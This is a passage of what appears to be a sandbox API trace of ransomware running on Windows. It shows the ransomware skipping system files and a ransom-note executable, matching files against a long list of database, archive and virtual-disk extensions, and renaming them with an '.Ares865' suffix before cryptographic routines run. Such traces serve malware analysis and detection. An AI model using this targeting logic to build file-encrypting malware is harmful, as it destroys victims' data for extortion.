ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeaa2466, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft at Home~.feed-ms", cAlternateFileName="MICROS~2.FEE")) returned 1 [0065.479] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.479] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="aoldtz.exe") returned 1 [0065.479] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".") returned 1 [0065.479] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="..") returned 1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="windows") returned -1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="bootmgr") returned 1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="temp") returned -1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="pagefile.sys") returned -1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="boot") returned 1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="ids.txt") returned 1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="ntuser.dat") returned -1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="perflogs") returned -1 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="MSBuild") returned -1 [0065.480] lstrlenW (lpString="Microsoft at Home~.feed-ms") returned 26 [0065.480] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned 71 [0065.480] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Microsoft at Home~.feed-ms" | out: lpString1="Microsoft at Home~.feed-ms") returned="Microsoft at Home~.feed-ms" [0065.480] lstrlenW (lpString="Microsoft at Home~.feed-ms") returned 26 [0065.480] lstrlenW (lpString="Ares865") returned 7 [0065.480] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0065.480] lstrlenW (lpString=".dll") returned 4 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".dll") returned 1 [0065.480] lstrlenW (lpString=".lnk") returned 4 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".lnk") returned 1 [0065.480] lstrlenW (lpString=".ini") returned 4 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".ini") returned 1 [0065.480] lstrlenW (lpString=".sys") returned 4 [0065.480] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".sys") returned 1 [0065.480] lstrlenW (lpString="Microsoft at Home~.feed-ms") returned 26 [0065.480] lstrlenW (lpString="bak") returned 3 [0065.480] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0065.480] lstrlenW (lpString="ba_") returned 3 [0065.480] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0065.480] lstrlenW (lpString="dbb") returned 3 [0065.480] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0065.480] lstrlenW (lpString="vmdk") returned 4 [0065.480] lstrcmpiW (lpString1="d-ms", lpString2="vmdk") returned -1 [0065.480] lstrlenW (lpString="rar") returned 3 [0065.480] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0065.480] lstrlenW (lpString="zip") returned 3 [0065.480] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0065.480] lstrlenW (lpString="tgz") returned 3 [0065.480] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0065.481] lstrlenW (lpString="vbox") returned 4 [0065.481] lstrcmpiW (lpString1="d-ms", lpString2="vbox") returned -1 [0065.481] lstrlenW (lpString="vdi") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0065.481] lstrlenW (lpString="vhd") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0065.481] lstrlenW (lpString="vhdx") returned 4 [0065.481] lstrcmpiW (lpString1="d-ms", lpString2="vhdx") returned -1 [0065.481] lstrlenW (lpString="avhd") returned 4 [0065.481] lstrcmpiW (lpString1="d-ms", lpString2="avhd") returned 1 [0065.481] lstrlenW (lpString="db") returned 2 [0065.481] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0065.481] lstrlenW (lpString="db2") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0065.481] lstrlenW (lpString="db3") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0065.481] lstrlenW (lpString="dbf") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0065.481] lstrlenW (lpString="mdf") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0065.481] lstrlenW (lpString="mdb") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0065.481] lstrlenW (lpString="sql") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0065.481] lstrlenW (lpString="sqlite") returned 6 [0065.481] lstrcmpiW (lpString1="eed-ms", lpString2="sqlite") returned -1 [0065.481] lstrlenW (lpString="sqlite3") returned 7 [0065.481] lstrcmpiW (lpString1="feed-ms", lpString2="sqlite3") returned -1 [0065.481] lstrlenW (lpString="sqlitedb") returned 8 [0065.481] lstrcmpiW (lpString1=".feed-ms", lpString2="sqlitedb") returned -1 [0065.481] lstrlenW (lpString="xml") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0065.481] lstrlenW (lpString="$er") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0065.481] lstrlenW (lpString="4dd") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0065.481] lstrlenW (lpString="4dl") returned 3 [0065.481] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0065.482] lstrlenW (lpString="^^^") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0065.482] lstrlenW (lpString="abs") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0065.482] lstrlenW (lpString="abx") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0065.482] lstrlenW (lpString="accdb") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accdb") returned 1 [0065.482] lstrlenW (lpString="accdc") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accdc") returned 1 [0065.482] lstrlenW (lpString="accde") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accde") returned 1 [0065.482] lstrlenW (lpString="accdr") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accdr") returned 1 [0065.482] lstrlenW (lpString="accdt") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accdt") returned 1 [0065.482] lstrlenW (lpString="accdw") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accdw") returned 1 [0065.482] lstrlenW (lpString="accft") returned 5 [0065.482] lstrcmpiW (lpString1="ed-ms", lpString2="accft") returned 1 [0065.482] lstrlenW (lpString="adb") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.482] lstrlenW (lpString="adb") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.482] lstrlenW (lpString="ade") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0065.482] lstrlenW (lpString="adf") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0065.482] lstrlenW (lpString="adn") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0065.482] lstrlenW (lpString="adp") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0065.482] lstrlenW (lpString="alf") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0065.482] lstrlenW (lpString="ask") returned 3 [0065.482] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0065.483] lstrlenW (lpString="btr") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0065.483] lstrlenW (lpString="cat") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0065.483] lstrlenW (lpString="cdb") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0065.483] lstrlenW (lpString="ckp") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0065.483] lstrlenW (lpString="cma") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0065.483] lstrlenW (lpString="cpd") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0065.483] lstrlenW (lpString="dacpac") returned 6 [0065.483] lstrcmpiW (lpString1="eed-ms", lpString2="dacpac") returned 1 [0065.483] lstrlenW (lpString="dad") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0065.483] lstrlenW (lpString="dadiagrams") returned 10 [0065.483] lstrcmpiW (lpString1="e~.feed-ms", lpString2="dadiagrams") returned 1 [0065.483] lstrlenW (lpString="daschema") returned 8 [0065.483] lstrcmpiW (lpString1=".feed-ms", lpString2="daschema") returned -1 [0065.483] lstrlenW (lpString="db-journal") returned 10 [0065.483] lstrcmpiW (lpString1="e~.feed-ms", lpString2="db-journal") returned 1 [0065.483] lstrlenW (lpString="db-shm") returned 6 [0065.483] lstrcmpiW (lpString1="eed-ms", lpString2="db-shm") returned 1 [0065.483] lstrlenW (lpString="db-wal") returned 6 [0065.483] lstrcmpiW (lpString1="eed-ms", lpString2="db-wal") returned 1 [0065.483] lstrlenW (lpString="dbc") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0065.483] lstrlenW (lpString="dbs") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0065.483] lstrlenW (lpString="dbt") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0065.483] lstrlenW (lpString="dbv") returned 3 [0065.483] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0065.483] lstrlenW (lpString="dbx") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0065.484] lstrlenW (lpString="dcb") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0065.484] lstrlenW (lpString="dct") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0065.484] lstrlenW (lpString="dcx") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0065.484] lstrlenW (lpString="ddl") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0065.484] lstrlenW (lpString="dlis") returned 4 [0065.484] lstrcmpiW (lpString1="d-ms", lpString2="dlis") returned 1 [0065.484] lstrlenW (lpString="dp1") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0065.484] lstrlenW (lpString="dqy") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0065.484] lstrlenW (lpString="dsk") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0065.484] lstrlenW (lpString="dsn") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0065.484] lstrlenW (lpString="dtsx") returned 4 [0065.484] lstrcmpiW (lpString1="d-ms", lpString2="dtsx") returned -1 [0065.484] lstrlenW (lpString="dxl") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0065.484] lstrlenW (lpString="eco") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0065.484] lstrlenW (lpString="ecx") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0065.484] lstrlenW (lpString="edb") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0065.484] lstrlenW (lpString="epim") returned 4 [0065.484] lstrcmpiW (lpString1="d-ms", lpString2="epim") returned -1 [0065.484] lstrlenW (lpString="fcd") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0065.484] lstrlenW (lpString="fdb") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0065.484] lstrlenW (lpString="fic") returned 3 [0065.484] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0065.484] lstrlenW (lpString="flexolibrary") returned 12 [0065.485] lstrcmpiW (lpString1="ome~.feed-ms", lpString2="flexolibrary") returned 1 [0065.485] lstrlenW (lpString="fm5") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0065.485] lstrlenW (lpString="fmp") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0065.485] lstrlenW (lpString="fmp12") returned 5 [0065.485] lstrcmpiW (lpString1="ed-ms", lpString2="fmp12") returned -1 [0065.485] lstrlenW (lpString="fmpsl") returned 5 [0065.485] lstrcmpiW (lpString1="ed-ms", lpString2="fmpsl") returned -1 [0065.485] lstrlenW (lpString="fol") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0065.485] lstrlenW (lpString="fp3") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0065.485] lstrlenW (lpString="fp4") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0065.485] lstrlenW (lpString="fp5") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0065.485] lstrlenW (lpString="fp7") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0065.485] lstrlenW (lpString="fpt") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0065.485] lstrlenW (lpString="frm") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0065.485] lstrlenW (lpString="gdb") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.485] lstrlenW (lpString="gdb") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0065.485] lstrlenW (lpString="grdb") returned 4 [0065.485] lstrcmpiW (lpString1="d-ms", lpString2="grdb") returned -1 [0065.485] lstrlenW (lpString="gwi") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0065.485] lstrlenW (lpString="hdb") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0065.485] lstrlenW (lpString="his") returned 3 [0065.485] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0065.485] lstrlenW (lpString="ib") returned 2 [0065.485] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0065.485] lstrlenW (lpString="idb") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0065.486] lstrlenW (lpString="ihx") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0065.486] lstrlenW (lpString="itdb") returned 4 [0065.486] lstrcmpiW (lpString1="d-ms", lpString2="itdb") returned -1 [0065.486] lstrlenW (lpString="itw") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0065.486] lstrlenW (lpString="jet") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0065.486] lstrlenW (lpString="jtx") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0065.486] lstrlenW (lpString="kdb") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0065.486] lstrlenW (lpString="kexi") returned 4 [0065.486] lstrcmpiW (lpString1="d-ms", lpString2="kexi") returned -1 [0065.486] lstrlenW (lpString="kexic") returned 5 [0065.486] lstrcmpiW (lpString1="ed-ms", lpString2="kexic") returned -1 [0065.486] lstrlenW (lpString="kexis") returned 5 [0065.486] lstrcmpiW (lpString1="ed-ms", lpString2="kexis") returned -1 [0065.486] lstrlenW (lpString="lgc") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0065.486] lstrlenW (lpString="lwx") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0065.486] lstrlenW (lpString="maf") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0065.486] lstrlenW (lpString="maq") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0065.486] lstrlenW (lpString="mar") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0065.486] lstrlenW (lpString="marshal") returned 7 [0065.486] lstrcmpiW (lpString1="feed-ms", lpString2="marshal") returned -1 [0065.486] lstrlenW (lpString="mas") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0065.486] lstrlenW (lpString="mav") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0065.486] lstrlenW (lpString="maw") returned 3 [0065.486] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0065.487] lstrlenW (lpString="mdbhtml") returned 7 [0065.487] lstrcmpiW (lpString1="feed-ms", lpString2="mdbhtml") returned -1 [0065.487] lstrlenW (lpString="mdn") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0065.487] lstrlenW (lpString="mdt") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0065.487] lstrlenW (lpString="mfd") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0065.487] lstrlenW (lpString="mpd") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0065.487] lstrlenW (lpString="mrg") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0065.487] lstrlenW (lpString="mud") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0065.487] lstrlenW (lpString="mwb") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0065.487] lstrlenW (lpString="myd") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0065.487] lstrlenW (lpString="ndf") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0065.487] lstrlenW (lpString="nnt") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0065.487] lstrlenW (lpString="nrmlib") returned 6 [0065.487] lstrcmpiW (lpString1="eed-ms", lpString2="nrmlib") returned -1 [0065.487] lstrlenW (lpString="ns2") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0065.487] lstrlenW (lpString="ns3") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0065.487] lstrlenW (lpString="ns4") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0065.487] lstrlenW (lpString="nsf") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0065.487] lstrlenW (lpString="nv") returned 2 [0065.487] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0065.487] lstrlenW (lpString="nv2") returned 3 [0065.487] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0065.487] lstrlenW (lpString="nwdb") returned 4 [0065.488] lstrcmpiW (lpString1="d-ms", lpString2="nwdb") returned -1 [0065.488] lstrlenW (lpString="nyf") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0065.488] lstrlenW (lpString="odb") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.488] lstrlenW (lpString="odb") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0065.488] lstrlenW (lpString="oqy") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0065.488] lstrlenW (lpString="ora") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0065.488] lstrlenW (lpString="orx") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0065.488] lstrlenW (lpString="owc") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0065.488] lstrlenW (lpString="p96") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0065.488] lstrlenW (lpString="p97") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0065.488] lstrlenW (lpString="pan") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0065.488] lstrlenW (lpString="pdb") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0065.488] lstrlenW (lpString="pdm") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0065.488] lstrlenW (lpString="pnz") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0065.488] lstrlenW (lpString="qry") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0065.488] lstrlenW (lpString="qvd") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0065.488] lstrlenW (lpString="rbf") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0065.488] lstrlenW (lpString="rctd") returned 4 [0065.488] lstrcmpiW (lpString1="d-ms", lpString2="rctd") returned -1 [0065.488] lstrlenW (lpString="rod") returned 3 [0065.488] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0065.488] lstrlenW (lpString="rodx") returned 4 [0065.488] lstrcmpiW (lpString1="d-ms", lpString2="rodx") returned -1 [0065.489] lstrlenW (lpString="rpd") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0065.489] lstrlenW (lpString="rsd") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0065.489] lstrlenW (lpString="sas7bdat") returned 8 [0065.489] lstrcmpiW (lpString1=".feed-ms", lpString2="sas7bdat") returned -1 [0065.489] lstrlenW (lpString="sbf") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0065.489] lstrlenW (lpString="scx") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0065.489] lstrlenW (lpString="sdb") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0065.489] lstrlenW (lpString="sdc") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0065.489] lstrlenW (lpString="sdf") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0065.489] lstrlenW (lpString="sis") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0065.489] lstrlenW (lpString="spq") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0065.489] lstrlenW (lpString="te") returned 2 [0065.489] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0065.489] lstrlenW (lpString="teacher") returned 7 [0065.489] lstrcmpiW (lpString1="feed-ms", lpString2="teacher") returned -1 [0065.489] lstrlenW (lpString="tmd") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0065.489] lstrlenW (lpString="tps") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0065.489] lstrlenW (lpString="trc") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.489] lstrlenW (lpString="trc") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0065.489] lstrlenW (lpString="trm") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0065.489] lstrlenW (lpString="udb") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0065.489] lstrlenW (lpString="udl") returned 3 [0065.489] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0065.490] lstrlenW (lpString="usr") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0065.490] lstrlenW (lpString="v12") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0065.490] lstrlenW (lpString="vis") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0065.490] lstrlenW (lpString="vpd") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0065.490] lstrlenW (lpString="vvv") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0065.490] lstrlenW (lpString="wdb") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0065.490] lstrlenW (lpString="wmdb") returned 4 [0065.490] lstrcmpiW (lpString1="d-ms", lpString2="wmdb") returned -1 [0065.490] lstrlenW (lpString="wrk") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0065.490] lstrlenW (lpString="xdb") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0065.490] lstrlenW (lpString="xld") returned 3 [0065.490] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0065.490] lstrlenW (lpString="xmlff") returned 5 [0065.490] lstrcmpiW (lpString1="ed-ms", lpString2="xmlff") returned -1 [0065.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.Ares865") returned 104 [0065.490] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0065.505] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.505] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0065.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.505] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.506] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.506] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.506] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7300, lpName=0x0) returned 0x118 [0065.508] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7300) returned 0x190000 [0065.510] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.510] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.511] 